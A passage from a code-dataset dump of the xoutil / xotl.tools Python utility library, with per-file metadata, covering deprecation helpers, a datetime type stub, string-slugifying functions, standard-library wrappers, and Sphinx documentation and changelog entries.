DEFAULT_MSG, dst_name, new_name=alias\n )\n target = deprecator(target)\n setattr(dst, alias, target)\n else:\n msg = \"cannot import '{}' from '{}'\"\n raise ImportError(msg.format(name, src_name))\n\n\ndef deprecate_linked(check=None, msg=None):\n \"\"\"Deprecate an entire module if used through a link.\n\n This function must be called in the global context of the new module.\n\n :param check: Must be a module name to check, it must be part of the\n actual module name. If not given 'xotl.tools.future' is assumed.\n\n For example::\n\n >>> from xotl.tools.deprecation import deprecate_linked\n >>> deprecate_linked()\n >>> del deprecate_linked\n\n \"\"\"\n import inspect\n\n check = check or \"xotl.tools.future\"\n frame = inspect.currentframe().f_back\n try:\n name = frame.f_globals.get(\"__name__\")\n finally:\n # As recommended in Python's documentation to avoid memory leaks\n del frame\n if check not in name:\n if msg is None:\n msg = (\n '\"{}\" module is now deprecated and it will be removed; use '\n 'the one in \"{}\" instead.'\n ).format(name, check)\n warnings.warn(msg, stacklevel=2)\n\n\ndef deprecate_module(replacement, msg=None):\n \"\"\"Deprecate an entire module.\n\n This function must be called in the global context of the deprecated\n module.\n\n :param replacement: The name of replacement module.\n\n For example::\n\n >>> from xotl.tools.deprecation import deprecate_module\n >>> deprecate_module('xotl.tools.symbols')\n >>> del deprecate_module\n\n \"\"\"\n import inspect\n\n frame = inspect.currentframe().f_back\n try:\n name = frame.f_globals.get(\"__name__\")\n finally:\n # As recommended in Python's documentation to avoid memory leaks\n del frame\n if msg is None:\n msg = (\n '\"{}\" module is now deprecated and it will be removed; ' 'use \"{}\" instead.'\n ).format(name, replacement)\n if msg:\n warnings.warn(msg, stacklevel=2)\n\n\n@deprecated(import_deprecated)\ndef inject_deprecated(funcnames, source, target=None):\n \"\"\"Injects a set of functions from a module into another.\n\n The functions will be marked as deprecated in the target module.\n\n :param funcnames: function names to take from the source module.\n\n :param source: the module where the functions resides.\n\n :param target: the module that will contains the deprecated functions. If\n ``None`` will be the module calling this function.\n\n This function is provided for easing the deprecation of whole modules and\n should not be used to do otherwise.\n\n .. deprecated:: 1.8.0 Use `import_deprecated`:func:.\n\n \"\"\"\n if not target:\n import sys\n\n frame = sys._getframe(1)\n try:\n target_locals = frame.f_locals\n finally:\n # As recommended to avoid memory leaks\n del frame\n else:\n # FIX: @manu, there is a consistency error here, 'target_locals' is\n # never assigned\n pass\n for targetname in funcnames:\n unset = object()\n target = getattr(source, targetname, unset)\n if target is not unset:\n testclasses = (types.FunctionType, types.LambdaType, type)\n if isinstance(target, testclasses):\n replacement = source.__name__ + \".\" + targetname\n module_name = target_locals.get(\"__name__\", None)\n target_locals[targetname] = deprecated(\n replacement, DEFAULT_MSG, module_name\n )(target)\n else:\n target_locals[targetname] = target\n else:\n warnings.warn(\n \"{targetname} was expected to be in {source}\".format(\n targetname=targetname, source=source.__name__\n ),\n stacklevel=2,\n )\n\n\ndef deprecated_alias(f, **kwargs):\n \"\"\"Declare a deprecated alias.\n\n This is roughly the same as ``deprecated(f)(f)``; which is makes it\n convenient to give a better name to an already released function `f`,\n while keeping the old name as a deprecated alias.\n\n .. versionadded:: 2.1.0\n\n \"\"\"\n return deprecated(f, **kwargs)(f)\n" }, { "alpha_fraction": 0.5886897444725037, "alphanum_fraction": 0.5886897444725037, "avg_line_length": 40.487178802490234, "blob_id": "2bd24c6564eb3464e8884a6ea1d3d8d53e084583", "content_id": "9920b4d3c495b99b6569c64d17861e22505bb02f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3236, "license_type": "no_license", "max_line_length": 84, "num_lines": 78, "path": "/xotl/tools/future/datetime.pyi", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "from datetime import *\nfrom typing import *\n\ndef new_date(d: date) -> date: ...\ndef new_datetime(d: date) -> datetime: ...\ndef strfdelta(delta: timedelta) -> str: ...\ndef strftime(dt: date, fmt: str) -> str: ...\ndef parse_date(value: str = None) -> date: ...\ndef parse_datetime(value: str = None) -> datetime: ...\ndef get_month_first(ref: date = None) -> date: ...\ndef get_month_last(ref: date = None) -> date: ...\ndef get_next_month(ref: date = None, lastday: bool = False) -> date: ...\ndef is_full_month(start: date, end: date) -> bool: ...\n\nclass flextime(timedelta):\n @classmethod\n def parse_simple_timeformat(cls, which: str) -> Tuple[int, int, int]: ...\n\nclass TimeSpan:\n start_date: Optional[date]\n end_date: Optional[date]\n def __init__(\n self, start_date: Union[str, date] = None, end_date: Union[str, date] = None\n ) -> None: ...\n @classmethod\n def from_date(self, date: date) -> \"TimeSpan\": ...\n @property\n def past_unbound(self) -> bool: ...\n @property\n def future_unbound(self) -> bool: ...\n @property\n def unbound(self) -> bool: ...\n @property\n def bound(self) -> bool: ...\n @property\n def valid(self) -> bool: ...\n def __contains__(self, other: date) -> bool: ...\n def overlaps(self, other: \"TimeSpan\") -> bool: ...\n def isdisjoint(self, other: \"TimeSpan\") -> bool: ...\n def __le__(self, other: \"TimeSpan\") -> bool: ...\n def issubset(self, other: \"TimeSpan\") -> bool: ...\n def __lt__(self, other: \"TimeSpan\") -> bool: ...\n def __gt__(self, other: \"TimeSpan\") -> bool: ...\n def __ge__(self, other: \"TimeSpan\") -> bool: ...\n def covers(self, other: \"TimeSpan\") -> bool: ...\n def issuperset(self, other: \"TimeSpan\") -> bool: ...\n def __iter__(self) -> Iterator[date]: ...\n def __getitem__(self, index: int) -> date: ...\n def __eq__(self, other: Union[date, \"TimeSpan\"]) -> bool: ...\n def __and__(self, other: \"TimeSpan\") -> \"TimeSpan\": ...\n def __lshift__(self, delta: Union[int, timedelta]) -> \"TimeSpan\": ...\n def __rshift__(self, delta: Union[int, timedelta]) -> \"TimeSpan\": ...\n def intersection(self, *others: \"TimeSpan\") -> \"TimeSpan\": ...\n def diff(self, other: \"TimeSpan\") -> Tuple[TimeSpan, TimeSpan]: ...\n\nclass DateTimeSpan(TimeSpan):\n start_datetime: Optional[datetime]\n end_datetime: Optional[datetime]\n def __init__(\n self,\n start_datetime: Union[str, date] = None,\n end_datetime: Union[str, date] = None,\n ) -> None: ...\n @classmethod\n def from_date(self, d: date) -> \"DateTimeSpan\": ...\n @classmethod\n def from_datetime(self, dt: datetime) -> \"DateTimeSpan\": ...\n @classmethod\n def from_timespan(self, ts: TimeSpan) -> \"DateTimeSpan\": ...\n def __iter__(self) -> Iterator[datetime]: ...\n def __getitem__(self, index: int) -> datetime: ...\n def __and__(self, other: TimeSpan) -> \"DateTimeSpan\": ...\n def __lshift__(self, delta: Union[int, timedelta]) -> \"DateTimeSpan\": ...\n def __rshift__(self, delta: Union[int, timedelta]) -> \"DateTimeSpan\": ...\n def intersection(self, *others: TimeSpan) -> \"DateTimeSpan\": ...\n def diff(self, other: TimeSpan) -> Tuple[\"DateTimeSpan\", \"DateTimeSpan\"]: ...\n\nEmptyTimeSpan: DateTimeSpan\n" }, { "alpha_fraction": 0.5742870569229126, "alphanum_fraction": 0.5775068998336792, "avg_line_length": 16.392000198364258, "blob_id": "e1b6eeeb0cef0c3185327eeeb4ed18ba0985afe8", "content_id": "d135312d6a72a3ed82ef7c8aa96dc5d21548cf33", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 4349, "license_type": "permissive", "max_line_length": 76, "num_lines": 250, "path": "/docs/source/xotl.tools/dim/base.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "==============================================================\n `xotl.tools.dim.base`:mod: - The base `physical quantities`_\n==============================================================\n\n.. automodule:: xotl.tools.dim.base\n\n.. autoclass:: Length\n\n The Length base quantity.\n\n .. attribute:: metre\n\n The canonical unit.\n\n .. attribute:: m\n\n An alias of `metre`:attr:\n\n Other attributes:\n\n .. attribute:: kilometre\n .. attribute:: km\n .. attribute:: centimetre\n .. attribute:: cm\n .. attribute:: millimetre\n .. attribute:: mm\n .. attribute:: nanometre\n .. attribute:: nm\n\n\n.. autoclass:: Time\n\n The Time base quantity.\n\n .. attribute:: second\n\n The canonical unit.\n\n .. attribute:: s\n\n An alias of `second`:attr:\n\n Other attributes:\n\n .. attribute:: millisecond\n .. attribute:: ms\n .. attribute:: nanosecond\n .. attribute:: ns\n .. attribute:: minute\n .. attribute:: hour\n\n\n.. autoclass:: Mass\n\n The Mass base quantity.\n\n .. attribute:: kilogram\n\n The canonical unit.\n\n .. attribute:: kg\n\n An alias of `kilogram`:attr:\n\n Other attributes:\n\n .. attribute:: gram\n\n\n.. autoclass:: ElectricCurrent\n\n The electrical current base quantity.\n\n .. attribute:: ampere\n\n The canonical unit.\n\n .. attribute:: A\n\n An alias of `ampere`:attr:\n\n\n.. autoclass:: Temperature\n\n The thermodynamic temperature base quantity.\n\n .. attribute:: kelvin\n\n The canonical unit.\n\n .. attribute:: K\n\n An alias of `kelvin`:attr:\n\n\n .. automethod:: from_celcius\n\n .. automethod:: from_fahrenheit\n\n\n.. autoclass:: Substance\n\n The amount of substance.\n\n .. attribute:: mole\n\n .. attribute:: mol\n\n An alias of `mole`:attr:.\n\n\n.. autoclass:: Luminosity\n\n The luminous intensity base quantity.\n\n .. attribute:: candela\n\n\n\nAliases\n=======\n\n.. class:: L\n\n An alias of `Length`:class:\n\n\n.. class:: T\n\n An alias of `Time`:class:\n\n\n.. class:: M\n\n An alias of `Mass`:class:\n\n\n.. class:: I\n\n An alias of `ElectricCurrent`:class:\n\n\n.. class:: O\n\n An alias of `Temperature`:class:. We can't really use the Greek Theta Θ\n\n\n.. class:: N\n\n An alias of `Substance`:class:\n\n\n.. class:: J\n\n An alias of `Luminosity`:class:\n\n\n\nDerived quantities\n==================\n\n.. class:: Area\n\n Defined as `L`:class:\\ ``**2``.\n\n .. attribute:: metre_squared\n\n The canonical unit.\n\n.. class:: Volume\n\n Defined as `L`:class:\\ ``**3``.\n\n .. attribute:: metre_cubic\n\n The canonical unit.\n\n\n.. class:: Frequency\n\n Defined as `T`:class:\\ ``**-1`` (which is the same as ``1/T``).\n\n .. attribute:: unit_per_second\n\n The canonical unit.\n\n Aliases of the canonical unit:\n\n .. attribute:: Hz\n\n\n.. class:: Force\n\n Defined as `L`:class: ``*`` `M`:class: ``*`` `T`:class:\\ ``**-2``.\n\n .. attribute:: metre_kilogram_per_second_squared\n\n The canonical unit.\n\n Aliases of the canonical unit:\n\n .. attribute:: N\n .. attribute:: Newton\n\n.. class:: Presure\n\n Defined as `L`:class:\\ ``**-1 *`` `M`:class: ``*`` `T`:class:\\ ``**-2``.\n\n .. attribute:: kilogram_per_metre_per_second_squared\n\n Aliases of the canonical unit:\n\n .. attribute:: pascal\n .. attribute:: Pa\n\n.. class:: Velocity\n\n Defined as `L`:class: ``*`` `T`:class:\\ ``**-1``.\n\n .. attribute:: metre_per_second\n\n The canonical unit.\n\n.. class:: Acceleration\n\n Defined as `L`:class: ``*`` `T`:class:\\ ``**-2``.\n\n .. attribute:: metre_per_second_squared\n\n The canonical unit.\n\n\nOn the automatically created names for derived quantities\n=========================================================\n\nWe automatically create the name of the canonical unit of quantities derived\nfrom others by simple rules:\n\n- ``A * B`` joins the canonical unit names together with a low dash '_'\n in-between. Let's represent it as `a_b`, where `a` stands for the name of\n the canonical unit of ``A`` and `b`, the canonical unit of ``B``.\n\n For the case, ``A * A`` the unit name is `a_squared`.\n\n- ``A/B`` gets the name `a_per_b`. ``1/A`` gets the name `unit_per_a`\n\n- ``A**n``; when ``n=1`` this is the same as ``A``; when ``n=2`` this is the\n same as ``A * A``; for other positive values of ``n``, the canonical unit\n name is `a_pow_n`; for negative values of ``n`` is the same as ``1/A**n``;\n for ``n=0`` this is the `~xotl.tools.dim.meta.Scalar`:class: quantity.\n" }, { "alpha_fraction": 0.6081946492195129, "alphanum_fraction": 0.6235595345497131, "avg_line_length": 23.40625, "blob_id": "793c49b8e3b27071d9a1c29d5e43b7e9c2e46ab3", "content_id": "a7ea33b2f3f2e874964bc5df66408bd514885bd2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 781, "license_type": "no_license", "max_line_length": 74, "num_lines": 32, "path": "/xotl/tools/future/contextlib.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Python Software Foundation\n# All rights reserved.\n#\n# Most of the contents of this file were extracted from the source code of\n# CPython 3.6.\n#\n\n\"\"\"Utilities for `with-statement contexts <343>`:pep:.\n\nThis module re-export all symbols from the standard library, with the\nexception of the function `nested`.\n\n.. versionadded:: 1.9.5\n\n\"\"\"\n\nimport contextlib as _stdlib # noqa\nfrom contextlib import * # noqa\n\n__all__ = list(getattr(_stdlib, \"__all__\", []))\n\n\ntry:\n # New in version 3.5 of standard library.\n redirect_stderr # noqa\nexcept NameError:\n from contextlib2 import redirect_stderr # noqa\n\n __all__.append(\"redirect_stderr\")\n" }, { "alpha_fraction": 0.6898047924041748, "alphanum_fraction": 0.7570499181747437, "avg_line_length": 40.90909194946289, "blob_id": "1319d415a8c9dd81913f0cd5826a89fc599ee366", "content_id": "5498339e2817aa5b2f5f23cfd538399625d8abf2", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 461, "license_type": "permissive", "max_line_length": 85, "num_lines": 11, "path": "/docs/source/history/_changes-1.7.9.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Deprecate `xoutil.dim.meta.Signature.isunit`:meth:.\n\n- Rename `xoutil.dim.meta.QuantityType`:class: to\n `xoutil.dim.meta.Dimension`:class:.\n\n- Fix bug__ in `xoutil.datetime.TimeSpan`:class:.\n `~xoutil.datetime.TimeSpan.start_date`:attr: and\n `~xoutil.datetime.TimeSpan.end_date`:attr: now return an instance of\n Python's `datetime.date`:class: instead of a sub-class.\n\n__ https://github.com/merchise/xoutil/commit/9948d480da994212182ff7c4c865e8588e394952\n" }, { "alpha_fraction": 0.6126172542572021, "alphanum_fraction": 0.6195886135101318, "avg_line_length": 32.29226303100586, "blob_id": "44f1cd4d67e5340aaa89de2b310921b4ee85c09a", "content_id": "fcef9d7984a0008d895fb5048b414c9db16e8cff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11627, "license_type": "no_license", "max_line_length": 86, "num_lines": 349, "path": "/xotl/tools/string.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Some additions for `string` standard module.\n\nIn Python 3 `str` is always unicode but `unicode` and `basestring` types\ndoesn't exists. `bytes` type can be used as an array of one byte each item.\n\n\"\"\"\n\n\nfrom xotl.tools.deprecation import deprecated # noqa\nfrom xotl.tools.deprecation import import_deprecated # noqa\n\n\n_MIGRATED_TO_CODECS = (\"force_encoding\", \"safe_decode\", \"safe_encode\")\n\nimport_deprecated(\"xotl.tools.future.codecs\", *_MIGRATED_TO_CODECS)\n\n\n@deprecated\ndef safe_strip(value):\n \"\"\"Removes the leading and tailing space-chars from `value` if string, else\n return `value` unchanged.\n\n \"\"\"\n return value.strip() if isinstance(value, str) else value\n\n\n# TODO: Functions starting with 'cut_' must be reviewed, maybe migrated to\n# some module dedicated to \"string trimming\".\ndef cut_prefix(value, prefix):\n \"\"\"Removes the leading `prefix` if exists, else return `value`\n unchanged.\n\n \"\"\"\n from xotl.tools.future.codecs import safe_encode, safe_decode\n\n if isinstance(value, str) and isinstance(prefix, bytes):\n prefix = safe_decode(prefix)\n elif isinstance(value, bytes) and isinstance(prefix, str):\n prefix = safe_encode(prefix)\n return value[len(prefix) :] if value.startswith(prefix) else value\n\n\ndef cut_any_prefix(value, *prefixes):\n \"\"\"Apply `cut_prefix`:func: for the first matching prefix.\"\"\"\n result = prev = value\n i, top = 0, len(prefixes)\n while i < top and result == prev:\n prefix, i = prefixes[i], i + 1\n prev, result = result, cut_prefix(prev, prefix)\n return result\n\n\ndef cut_prefixes(value, *prefixes):\n \"\"\"Apply `cut_prefix`:func: for all provided prefixes in order.\"\"\"\n result = value\n for prefix in prefixes:\n result = cut_prefix(result, prefix)\n return result\n\n\ndef cut_suffix(value, suffix):\n \"\"\"Removes the tailing `suffix` if exists, else return `value`\n unchanged.\n\n \"\"\"\n from xotl.tools.future.codecs import safe_decode, safe_encode\n\n if isinstance(value, str) and isinstance(suffix, bytes):\n suffix = safe_decode(suffix)\n elif isinstance(value, bytes) and isinstance(suffix, str):\n suffix = safe_encode(suffix)\n # Since value.endswith('') is always true but value[:-0] is actually\n # always value[:0], which is always '', we have to explictly test for\n # len(suffix)\n if len(suffix) > 0 and value.endswith(suffix):\n return value[: -len(suffix)]\n else:\n return value\n\n\ndef cut_any_suffix(value, *suffixes):\n \"\"\"Apply `cut_suffix`:func: for the first matching suffix.\"\"\"\n result = prev = value\n i, top = 0, len(suffixes)\n while i < top and result == prev:\n suffix, i = suffixes[i], i + 1\n prev, result = result, cut_suffix(prev, suffix)\n return result\n\n\ndef cut_suffixes(value, *suffixes):\n \"\"\"Apply `cut_suffix`:func: for all provided suffixes in order.\"\"\"\n result = value\n for suffix in suffixes:\n result = cut_suffix(result, suffix)\n return result\n\n\ndef force_ascii(value, encoding=None):\n \"\"\"Return the string normal form for the `value`\n\n Convert all non-ascii to valid characters using unicode 'NFKC'\n normalization.\n\n :param encoding: If `value` is not unicode, it is decoded before ASCII\n normalization using this encoding. If not provided use the return\n of `~xotl.tools.future.codecs.force_encoding`:func:.\n\n .. versionchanged:: 1.8.7 Add parameter 'encoding'.\n\n .. versionchanged:: 2.1.0 Moved to `xotl.tools.string`:mod:.\n\n \"\"\"\n import unicodedata\n from xotl.tools.future.codecs import safe_decode\n\n ASCII, IGNORE = \"ascii\", \"ignore\"\n if not isinstance(value, str):\n value = safe_decode(value, encoding=encoding)\n res = unicodedata.normalize(\"NFKD\", value).encode(ASCII, IGNORE)\n return str(res, ASCII, IGNORE)\n\n\ndef slugify(value, *args, **kwds):\n \"\"\"Return the normal-form of a given string value that is valid for slugs.\n\n Convert all non-ascii to valid characters, whenever possible, using\n unicode 'NFKC' normalization and lower-case the result. Replace unwanted\n characters by the value of `replacement` (remove extra when repeated).\n\n Default valid characters are ``[_a-z0-9]``. Extra arguments\n `invalid_chars` and `valid_chars` can modify this standard behaviour, see\n next:\n\n :param value: The source value to slugify.\n\n :param replacement: A character to be used as replacement for unwanted\n characters. Could be both, the first extra positional argument, or\n as a keyword argument. Default value is a hyphen ('-').\n\n There will be a contradiction if this argument contains any invalid\n character (see `invalid_chars`). ``None``, or ``False``, will be\n converted converted to an empty string for backward compatibility\n with old versions of this function, but not use this, will be\n deprecated.\n\n :param invalid_chars: Characters to be considered invalid. There is a\n default set of valid characters which are kept in the resulting\n slug. Characters given in this parameter are removed from the\n resulting valid character set (see `valid_chars`).\n\n Extra argument values can be used for compatibility with\n `invalid_underscore` argument in deprecated `normalize_slug`\n function:\n\n - ``True`` is a synonymous of underscore ``\"_\"``.\n\n - ``False`` or ``None``: An empty set.\n\n Could be given as a name argument or in the second extra positional\n argument. Default value is an empty set.\n\n :param valid_chars: A collection of extra valid characters. Could be\n either a valid string, any iterator of strings, or ``None`` to use\n only default valid characters. Non-ASCII characters are ignored.\n\n :param encoding: If `value` is not a text (unicode), it is decoded before\n `ASCII normalization <force_ascii>`:func:.\n\n Examples::\n\n >>> slugify(' Á.e i Ó u ') == 'a-e-i-o-u'\n True\n\n >>> slugify(' Á.e i Ó u ', '.', invalid_chars='AU') == 'e.i.o'\n True\n\n >>> slugify(' Á.e i Ó u ', valid_chars='.') == 'a.e-i-o-u'\n True\n\n >>> slugify('_x', '_') == '_x'\n True\n\n >>> slugify('-x', '_') == 'x'\n True\n\n >>> slugify(None) == 'none'\n True\n\n >>> slugify(1 == 1) == 'true'\n True\n\n >>> slugify(1.0) == '1-0'\n True\n\n >>> slugify(135) == '135'\n True\n\n >>> slugify(123456, '', invalid_chars='52') == '1346'\n True\n\n >>> slugify('_x', '_') == '_x'\n True\n\n .. versionchanged:: 1.5.5 Added the `invalid_underscore` parameter.\n\n .. versionchanged:: 1.6.6 Replaced the `invalid_underscore` paremeter by\n `invalids`. Added the `valids` parameter.\n\n .. versionchanged:: 1.7.2 Clarified the role of `invalids` with regards to\n `replacement`.\n\n .. versionchanged:: 1.8.0 Deprecate the `invalids` paremeter name in favor\n of `invalid_chars`, also deprecate the `valids` paremeter name in favor\n of `valid_chars`.\n\n .. versionchanged:: 1.8.7 Add parameter 'encoding'.\n\n .. versionchanged:: 2.1.0 Remove deprecated parameters `invalids` and\n `valids`.\n\n \"\"\"\n import re\n from xotl.tools.params import ParamManager\n\n from xotl.tools.values import compose, istype\n from xotl.tools.values.simple import not_false, ascii_coerce\n\n _str = compose(not_false(\"\"), istype(str))\n _ascii = compose(_str, ascii_coerce)\n _set = compose(_ascii, lambda v: \"\".join(set(v)))\n\n # local functions\n def _normalize(v):\n return force_ascii(v, encoding=encoding).lower()\n\n def _set(v):\n return re.escape(\"\".join(set(_normalize(v))))\n\n getarg = ParamManager(args, kwds)\n replacement = getarg(\"replacement\", 0, default=\"-\", coercers=(str,))\n invalid_chars = getarg(\"invalid_chars\", \"invalid\", 0, default=\"\", coercers=_ascii)\n valid_chars = getarg(\"valid_chars\", \"valid\", 0, default=\"\", coercers=_ascii)\n encoding = getarg(\"encoding\", default=None)\n replacement = args[0] if args else kwds.pop(\"replacement\", \"-\")\n # TODO: check unnecessary arguments, raising errors\n if replacement in (None, False):\n # for backward compatibility\n replacement = \"\"\n elif isinstance(replacement, str):\n replacement = _normalize(replacement)\n else:\n raise TypeError(\n 'slugify() replacement \"{}\" must be a string or None,'\n ' not \"{}\".'.format(replacement, type(replacement))\n )\n if invalid_chars is True:\n # Backward compatibility with former `invalid_underscore` argument\n invalid_chars = \"_\"\n elif invalid_chars in {None, False}:\n invalid_chars = \"\"\n else:\n if not isinstance(invalid_chars, str):\n invalid_chars = \"\".join(invalid_chars)\n invalid_chars = _set(invalid_chars)\n if invalid_chars:\n invalid_regex = re.compile(r\"[{}]+\".format(invalid_chars))\n if invalid_regex.search(replacement):\n raise ValueError(\n 'slugify() replacement \"{}\" must not contain '\n \"any invalid character.\".format(replacement)\n )\n else:\n invalid_regex = None\n if valid_chars is None:\n valid_chars = \"\"\n else:\n if not isinstance(valid_chars, str):\n valid_chars = \"\".join(valid_chars)\n valid_chars = _set(valid_chars)\n valid_chars = _set(re.sub(r\"[0-9a-z]+\", \"\", valid_chars))\n valid_chars = re.compile(r\"[^_0-9a-z{}]+\".format(valid_chars))\n # calculate result\n repl = \"\\t\" if replacement else \"\"\n res = valid_chars.sub(repl, _normalize(value))\n if invalid_regex:\n res = invalid_regex.sub(repl, res)\n if repl:\n # convert two or more replacements in only one instance\n r = r\"{}\".format(re.escape(repl))\n res = re.sub(r\"({r}){{2,}}\".format(r=r), repl, res)\n # remove start and end more replacement instances\n res = re.sub(r\"(^{r}+|{r}+$)\".format(r=r), \"\", res)\n res = re.sub(r\"[\\t]\", replacement, res)\n return res\n\n\ndef error2str(error):\n \"\"\"Convert an error to string.\"\"\"\n if isinstance(error, str):\n return error\n elif isinstance(error, BaseException):\n tname = type(error).__name__\n res = str(error)\n if tname in res:\n return res\n else:\n return \": \".join((tname, res)) if res else tname\n elif isinstance(error, type) and issubclass(error, BaseException):\n return error.__name__\n else:\n prefix = str(\"unknown error: \")\n cls = error if isinstance(error, type) else type(error) # force type\n tname = cls.__name__\n if cls is error:\n res = tname\n else:\n res = str(error)\n if tname not in res:\n res = str(\"{}({})\").format(tname, res) if res else tname\n return prefix + res\n\n\ndef make_a10z(string):\n \"\"\"Utility to find out that \"internationalization\" is \"i18n\".\n\n Examples::\n\n >>> print(make_a10z('parametrization'))\n p13n\n \"\"\"\n return string[0] + str(len(string[1:-1])) + string[-1]\n\n\n@deprecated(slugify)\ndef normalize_slug(value, *args, **kwds):\n return slugify(value, *args, **kwds)\n\n\ndel deprecated, import_deprecated\n" }, { "alpha_fraction": 0.6445229649543762, "alphanum_fraction": 0.6614841222763062, "avg_line_length": 34.375, "blob_id": "ae566be279f55d3de03305fd4725a35e9e91f822", "content_id": "d8febc61ad00bed4f1b00771e35315e43e0d002e", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1415, "license_type": "permissive", "max_line_length": 76, "num_lines": 40, "path": "/docs/source/xotl.tools/fs.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.fs`:mod: -- file system utilities\n=============================================\n\n.. automodule:: xotl.tools.fs\n :members: ensure_filename, imap, iter_dirs, iter_files,\n\t listdir, rmdirs, stat, walk_up\n\n.. autofunction:: concatfiles(*files, target)\n\n.. function:: makedirs(path, mode=0o777, exist_ok=False)\n\n Recursive directory creation function. Like `os.mkdir`:func:, but makes\n all intermediate-level directories needed to contain the leaf directory.\n\n The default *mode* is ``0o777`` (octal). On some systems, *mode* is\n ignored. Where it is used, the current umask value is first masked out.\n\n If *exist_ok* is ``False`` (the default), an `OSError`:exc: is raised if\n the target directory already exists.\n\n .. note:: `makedirs`:func: will become confused if the path elements to\n create include `os.pardir`:py:data: (eg. \"..\" on UNIX systems).\n\n This function handles UNC paths correctly.\n\n .. versionchanged:: 1.6.1 Behaves as Python 3.4.1.\n\n Before Python 3.4.1 (ie. xotl.tools 1.6.1), if *exist_ok* was ``True``\n and the directory existed, `makedirs`:func: would still raise an error\n if *mode* did not match the mode of the existing directory. Since this\n behavior was impossible to implement safely, it was removed in Python\n 3.4.1. See the original `os.makedirs`:py:func:.\n\n\nContents:\n\n.. toctree::\n :maxdepth: 1\n\n fs/path\n" }, { "alpha_fraction": 0.5698412656784058, "alphanum_fraction": 0.5952380895614624, "avg_line_length": 16.47222137451172, "blob_id": "0ffea67b201fff0ab542a41195003928946ee7b6", "content_id": "f396ddeecbc0f71bf765196f72c4b4e6f7013a1a", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 630, "license_type": "permissive", "max_line_length": 76, "num_lines": 36, "path": "/docs/source/index.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "\n.. xoutil documentation master file, created by\n sphinx-quickstart on Fri Jun 15 14:31:00 2012.\n You can adapt this file completely to your liking, but it should at least\n contain the root `toctree` directive.\n\nWelcome to xotl.tools's documentation!\n======================================\n\n.. automodule:: xotl.tools\n\nWhat's new in |release|\n-----------------------\n\n.. include:: history/_changes-2.2.0.rst\n\n\nContents\n--------\n\n.. toctree::\n :maxdepth: 1\n :glob:\n\n xotl.tools/*\n xoutil\n HISTORY\n CONTRIBUTING\n CONTRIBUTORS\n LICENSE\n\n\nIndices and tables\n==================\n\n* `genindex`:ref:\n* `search`:ref:\n" }, { "alpha_fraction": 0.6291891932487488, "alphanum_fraction": 0.6335135102272034, "avg_line_length": 25.428571701049805, "blob_id": "7d57c37df0ba7b68ca842a75248afd9514e510cc", "content_id": "30a0e55bc1ea5f76517c508b8071ae235bf9c1ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 926, "license_type": "no_license", "max_line_length": 77, "num_lines": 35, "path": "/xotl/tools/future/mimetypes.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions to standard library `mimetype`:mod:.\n\nThis module reexport all functions the *current* version of Python.\n\n.. versionadded:: 1.8.4\n\n\"\"\"\n\n\nimport mimetypes as _stdlib\nfrom mimetypes import * # noqa\n\nfrom xotl.tools.symbols import Unset\n\n\ndef guess_type(url, strict=True, default=(None, None)):\n \"\"\"Guess the type of a file based on its filename or URL, given by url.\n\n This is the same as `mimetypes.guess_type`:func: with the addition of the\n `default` keyword\n\n \"\"\"\n type, encoding = _stdlib.guess_type(url, strict=strict)\n if default is not Unset and type is None:\n type, encoding = default\n return type, encoding\n" }, { "alpha_fraction": 0.6904761791229248, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 41, "blob_id": "7f8307f7b379a9baa9581aa22fb69fec1cfc9e34", "content_id": "6e14956c5b87a67cd1487059299519307ee937b2", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 42, "license_type": "permissive", "max_line_length": 41, "num_lines": 1, "path": "/docs/source/history/_changes-1.7.11.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug #9: TimeSpans are not hashable.\n" }, { "alpha_fraction": 0.6341535449028015, "alphanum_fraction": 0.6394900679588318, "avg_line_length": 33.418365478515625, "blob_id": "0fb689c1e93db8d2edea04c9a516f9e458589450", "content_id": "8e2abb5e54028c5843ee8ed022b7092b8307e50f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3374, "license_type": "no_license", "max_line_length": 78, "num_lines": 98, "path": "/xoutil/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# 